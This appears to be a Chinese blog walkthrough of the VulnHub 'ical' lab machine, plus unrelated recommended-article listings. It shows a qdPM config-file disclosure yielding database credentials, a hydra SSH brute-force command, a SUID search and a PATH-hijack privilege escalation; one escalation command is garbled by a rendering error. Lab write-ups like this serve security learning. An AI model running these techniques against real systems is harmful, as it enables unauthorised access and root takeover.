【ical】靶场记录

最新推荐文章于 2024-07-22 15:12:37 发布
最新推荐文章于 2024-07-22 15:12:37 发布
阅读量140 收藏
点赞数
分类专栏: 靶机 文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46411728/article/details/128993324
版权

一、信息收集

IP:192.168.236.150
在这里插入图片描述
访问:
在这里插入图片描述
尝试sqlmap,没有信息

查看qdpb 9.2这个框架是否存在已知漏洞

二、端口扫描

发现具有22端口,80端口,3306端口
22端口:ssh连接密码爆破
80端口:页面没发现信息
3306端口:数据库密码爆破
在这里插入图片描述

三、漏洞库查询是否存在框架漏洞

命令:searchsploit qdpm在这里插入图片描述
首先打开第一个文件:
命令:searchsploit -p + 后缀 找到该文件的具体路径
在这里插入图片描述
命令:cat 路径
在这里插入图片描述
翻译:数据库的密码和连接字符串存储在yml文件中。要访问yml文件,可以访问http:///core/config/databases.yml文件并下载。

访问:http:///core/config/databases.yml

http://192.168.236.150/core/config/databases.yml在这里插入图片描述
数据库账号:qdpmadmin 密码:UcVQCMQk2STVeS6J

四、数据库连接

利用Navicat工具连接数据库:
在这里插入图片描述

在这里插入图片描述
查看到账号密码,密码是base64加密后的,汇总后如下:
这里的账号得要小写:
在这里插入图片描述
密码解密后:
在这里插入图片描述
得到了账号和密码,尝试ssh连接

五、SSH 爆破

利用hydra工具:
hydra -L /home/kali/桌面/2.txt -P /home/kali/桌面/3.txt -t 4 -v -e ns 192.168.236.150 ssh
在这里插入图片描述
爆破成功

进行登录:
在这里插入图片描述
在这里插入图片描述

六、提权

先查看是否存在一些敏感文件:
在这里插入图片描述意思就是存在漏洞点,需要自己发现

命令:find / -perm -u=s 2>/dev/null
寻找是否存在可执行root权限的二进制文件
在这里插入图片描述
关注:/opt/get_access
在这里插入图片描述
乱码中还是发现了:cat /root/system.info
在这里插入图片描述
cat可以打开root下的文件,说明cat具有root权限,还没有指定cat位置,可以创建一个cat文件,然后写入到环境变量里,达到提权
命令:
echo “/bin/bash” > /tmp/cat #在tmp下创建cat并写入/bin/bash
chmod 777 cat #对cat赋予执行权限
echo KaTeX parse error: Expected 'EOF', got '#' at position 30: … #̲写入环境变量----expor…PATH
/opt/get_access #执行,拿到root权限

在这里插入图片描述

七、总结

1、利用账号密码连接数据库要会,因为在linux和windows下连接数据库未成功,所以使用了Navicat工具
2、利用hydra进行ssh密码爆破
3、熟练使用msf漏洞库,来查找一些已知漏洞
4、提权,关注所有敏感文件和信息,具有root权限的可执行二进制文件

学安全的废物
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub-ical打靶记录
qq_43534481的博客
09-07 355
VulnHub-ical打靶记录
CTF学习-Vulnhub 靶场之DOUBLETROUBLE
dengpan119的博客
03-28 3839
Vulnhub 靶场之DOUBLETROUBLE 提示:IP地址用的是复制内网IP,建议是设置自己虚拟网络C段地址。 前言 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:172.X.X.176 windows10攻击机IP:172.X.X.189 靶机 ip:172.X.X.186-187 工具:VMware Workstation Pro/Oracle VM VirtualBox 提示:以下是本篇文章正文内容,下面案例可
java 解析 ical,如何用Java解析iCal RRULE
weixin_29649815的博客
02-28 459
I have the following iCal recurrence rule examples:"RRULE:FREQ=YEARLY;INTERVAL=2""RRULE:FREQ=WEEKLY;INTERVAL=2;BYDAY=TU,WE,TH"I need a Java library to parse the RRULE patterns to handle in an object. ...
java 解析 ical_转载iCalendar 编程基础:了解和使用 iCal4j
weixin_34223525的博客
02-28 885
iCalendar 简介iCalendar,简称“iCal”,是“日历数据交换”的标准(RFC 2445),该标准提供了一种公共的数据格式用于存储关于日历方面的信息,比如事件、约定、待办事项等。它不仅允许用户通过电子邮件发送会议或者待办事件等,也允许独立使用,而不局限于某种传输协议。目前,所有流行日历工具比如:LotusNotes、Outlook、GMail 和 Apple 的 iCal 都支持...
java 解析 ical_java-使用iCal4j的iCal中的HTML
weixin_33806859的博客
02-28 223
是否可以将HTML添加到来自vevent的描述中.我生成带有说明的VEVENT的VCALENDAR.我使用Ical4j通过ICS发送电子邮件这是我尝试做的:BEGIN:VCALENDARPRODID:-//----//Calendar 1.0//ESVERSION:2.0METHOD:REQUESTCALSCALE:GREGORIANBEGIN:VEVENTDTSTAMP:20101202T145...
java 解析 ical_读 Priactical Java 笔记
weixin_39656174的博客
02-28 113
性能(Performance)1.改善java性能并不是JVM和编译器的单方责任。编写这些程序的程序员也应该尽一份力。2.先把焦点放在设计,数据结构和算法本身。3.不要倚赖编译期(compile-time)优化技术。?看个例子:?Java2 SDK的javac相关文档宣称,- o选项能够为运行期产生优化的代码。?class Test?{?public static void main(String...
iCal及iCalendar说明
zzhongcy的专栏
02-03 1951
iCalendar
java 解析 ical_ical4j 实现ICS文件的生成和解析
weixin_33262687的博客
02-28 872
/*** 导入文件**@throwsParserException*@throwsIOException*/@Testpublic void importFile() throwsIOException, ParserException {FileInputStream fis= new FileInputStream("D://工作台//18013093863@189.cn1.ics");Cal...
TPF.rar_ical32.exe
09-24
综上所述,这个压缩包可能是一个完整的编码器测试解决方案,包含了一个执行测试的程序(ical32.exe)、相关的项目文档、技术资料、LabVIEW测试程序、数据记录以及辅助校准工具。这样的工具集对工程师来说非常宝贵,...
stream-deck-ical:用于elgato Stream Deck的iCal插件
05-08
Stream Deck iCal插件 用于iCal插件,可使用iCal URL显示日历中的信息。 视觉提示和倒计时将帮助您准时结束会议并为下一次会议做好准备。 该插件可在Stream Deck商店中找到,您也可以下载或使用此存储库上的代码自行...
ical.js:javascript的ical
05-15
ical.js (以前是节点的) javascript / node( )的容忍的,最小的icalendar解析器安装-Node.js ical.js在npm上可用: npm install ical原料药ical.parseICS(str) 用ICS文件解析字符串var data = ical.parseFile&#...
p6-ICal
03-29
【标题】"p6-ICal" 是一个基于 Raku(前身为 Perl 6)编程语言的库,用于处理 iCalendar(iCal)文件格式。iCalendar 是一种标准的文件格式,广泛用于日历和事件管理,允许用户在不同的应用程序之间共享和同步日程...
ical4j-1.0.3-src
02-21
ical4j是一个强大的Java库,专门用于处理iCalendar(RFC5545)格式的数据,如日历事件、任务和提醒。这个库的核心目标是帮助开发者在Java应用程序中解析、生成和操作iCalendar文件。ical4j-1.0.3-src是一个源代码包...
基于语音识别的会议记录系统
qq_51688022的博客
07-18 1421
本文简要介绍了本科毕设“基于语音识别的会议记录系统”的开发思路与成果
基于JSP的高校信息资源共享平台
最新发布
heye0910032的博客
07-22 340
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
Linux -软件安装
z2331198564653的博客
07-18 868
项目开发好需要部署,而项目本身可能依赖其他软件。这时在部署项目时就需要安装依赖的软件。比如: jdk mysql tomcat redis rabbitmq es等。
MySQL(事务、索引)&&MyBatis
hycccccch的博客
07-19 690
事务指的是一组操作的集合,是一个不可分割的工作单位。事务会将所有的操作作为一个整体一起向系统提交或撤销操作请求,即这些操作要么同时成功,要么同时失败默认MySQL的事务是自动提交,即当执行一条DML语句时,MySQL会立即隐式的提交事务开启事务后运行事务不会对数据改变,commit后才会改变数据如果有命令发生错误,需要进行rollback进行回滚、
PostgreSQL的逻辑架构
weixin_41992498的博客
07-18 127
一、PostgreSql的逻辑架构:所有者:
iCal4j 库怎么使用
06-12
iCal4j 是一个 Java 编写的处理 iCalendar(.ics)文件的库,可以实现 iCalendar 文件的解析、生成、修改等操作。下面介绍一些常用的 iCal4j 库的使用方法。 1. 解析 iCalendar 文件 ```java // 创建一个文件输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值